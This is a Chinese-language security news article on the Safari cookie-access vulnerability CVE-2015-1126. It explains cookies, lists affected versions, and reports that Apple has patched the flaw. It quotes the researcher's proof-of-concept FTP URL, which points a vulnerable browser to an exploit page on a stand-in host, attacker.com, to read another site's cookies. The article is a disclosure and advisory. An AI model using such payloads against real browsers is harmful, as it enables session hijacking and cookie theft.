存在于Safari浏览器中的一个cookie访问漏洞(CVE-2015-1126)可能会影响数十亿苹果产品,如果你在使用Safari浏览器,一定要尽快检测它是否受该漏洞影响,若受影响请尽快修复。
科普:cookie
Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。Cookie可以保持登录信息到用户下次与服务器的会话,即下次访问同一网站时,用户不必再次输入用户名和密码就可以登录。
Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理,用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。
漏洞详情
前段时间,芬兰一家公司Klikki Oy的安全研究员Jouko Pynnönen发现了Safari浏览器中存在安全漏洞(CVE-2015-1126),该漏洞可能会影响数十亿苹果产品。该跨域漏洞会影响Safari的URL文件传输机制,攻击者可以精心制作一个web网页,当受害者访问该页面时,就可以绕过一些正常的跨域限制,然后访问或操作任何网站的HTTP cookies。
Pynnönen在一份安全报告中写道:
“攻击者可以精心编制一个web页面,当目标网民访问该页面时,攻击者就可以绕过一些正常的跨域限制从而访问或操作任何网站的HTTP cookies。大多数允许用户登录的网站都会在cookies中存储它们的认证信息(通常是会话ID等信息),攻击者访问这些cookies就可以劫持认证会话。在iOS、OS X和Windows系统上所有Safari的测试版本都受该漏洞影响,产品总量可能达到十亿数量级。” |
研究人员解释道,iOS 8.1、6.1.6及OS X 10.9.3和Windows8.1系统上的7.0.4和5.1.7版本的Safari浏览器都受到该漏洞的影响。
漏洞PoC URL
目前针对此漏洞,在URL中的用户名或密码字段编码特殊字符就可能引发安全问题,示例链接如下所示。
ftp://user:password@host/path
当用户名或密码字段中包含编码的特殊字符时,通过操作该URL,攻击者可以下载目标网站的文档资料。Pynnönen还提供了下面的示例PoC URL:
ftp://user%40attacker.com%2Fexploit.html%23@apple.com/
当受害者访问该URL时,存在此漏洞的Safari浏览器会加载攻击者所控制网站attacker.com上的exploit.html文件,之后攻击者便会利用JavaScript访问和操作apple.com网站的cookies。受影响的浏览器会将上面URL解码成如下形式:
ftp://user@attacker.com/exploit.html#apple.com/
即在一个正常的web页面中嵌入指向一个FTP URL的IFRAME,这样就可以发起攻击了。
漏洞已修复
该漏洞已经被苹果公司修复,使用Safari浏览器的用户可以使用Safari cookie漏洞检测工具来检测其浏览器是否受影响,若受影响一定要尽快修复它。